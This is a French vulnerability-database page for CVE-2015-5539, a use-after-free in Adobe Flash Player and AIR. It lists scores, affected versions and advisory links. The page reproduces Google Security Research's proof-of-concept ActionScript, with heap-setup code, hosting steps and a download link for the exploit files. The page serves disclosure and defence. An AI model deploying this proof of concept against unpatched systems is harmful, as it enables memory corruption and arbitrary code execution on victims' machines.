CVE-2015-5539 : Détail

CVE-2015-5539

56.06%V3
Network
2015-08-13
23h00 +00:00
2018-01-04
18h57 +00:00
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Descriptions du CVE

Use-after-free vulnerability in Adobe Flash Player before 18.0.0.232 on Windows and OS X and before 11.2.202.508 on Linux, Adobe AIR before 18.0.0.199, Adobe AIR SDK before 18.0.0.199, and Adobe AIR SDK & Compiler before 18.0.0.199 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-5127, CVE-2015-5130, CVE-2015-5134, CVE-2015-5540, CVE-2015-5550, CVE-2015-5551, CVE-2015-5556, CVE-2015-5557, CVE-2015-5559, CVE-2015-5561, CVE-2015-5563, CVE-2015-5564, and CVE-2015-5565.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

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Score EPSS

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Percentile EPSS

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Informations sur l'Exploit

Exploit Database EDB-ID : 37855

Date de publication : 2015-08-18 22h00 +00:00
Auteur : Google Security Research
EDB Vérifié : Yes

Source: https://code.google.com/p/google-security-research/issues/detail?id=360&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id In certain cases where a native AS2 class sets an internal atom to a value, it can lead to a use-after-free if the variable is a SharedObject. While this example shows setting NetConnection.uri, this issue occurs in several other A proof of concept is as follows: var s = SharedObject.getLocal("test"); ASSetPropFlags(s, null, 0, 0xff); ASSetPropFlags(s.data, null, 0, 0xff); var q = {myprop :"natalie", myprop2 : "test"}; var n = new NetConnection(); s.data.uri = q; trace("uri " + s.data.uri); s.flush(); ASnative(2100, 200)(s.data); trace("uri " + s.data.uri); n.connect.call(s.data, xx); trace(s.data.uri); s = 1; var a = []; var c = []; for(i = 0; i < 200; i++){ var b = new flash.display.BitmapData(1000, 1000, true, 10); } setInterval(f, 1000); function f(){ ASnative(252, 1).call(q); //Array push } A fla, an AS file and two swfs are attached. slot.fla compiles to setnum.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and slot.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37855.zip

Products Mentioned

Configuraton 0

Adobe>>Flash_player >> Version To (including) 18.0.0.209

Apple>>Mac_os_x >> Version -

Microsoft>>Windows >> Version -

Configuraton 0

Adobe>>Flash_player >> Version To (including) 11.2.202.491

Linux>>Linux_kernel >> Version -

Configuraton 0

Adobe>>Air >> Version To (including) 18.0.0.180

Adobe>>Air_sdk >> Version To (including) 18.0.0.180

Adobe>>Air_sdk_\&_compiler >> Version To (including) 18.0.0.180

Références

https://www.exploit-db.com/exploits/37855/
Tags : exploit, x_refsource_EXPLOIT-DB
https://security.gentoo.org/glsa/201508-01
Tags : vendor-advisory, x_refsource_GENTOO
http://www.securitytracker.com/id/1033235
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/76288
Tags : vdb-entry, x_refsource_BID
http://rhn.redhat.com/errata/RHSA-2015-1603.html
Tags : vendor-advisory, x_refsource_REDHAT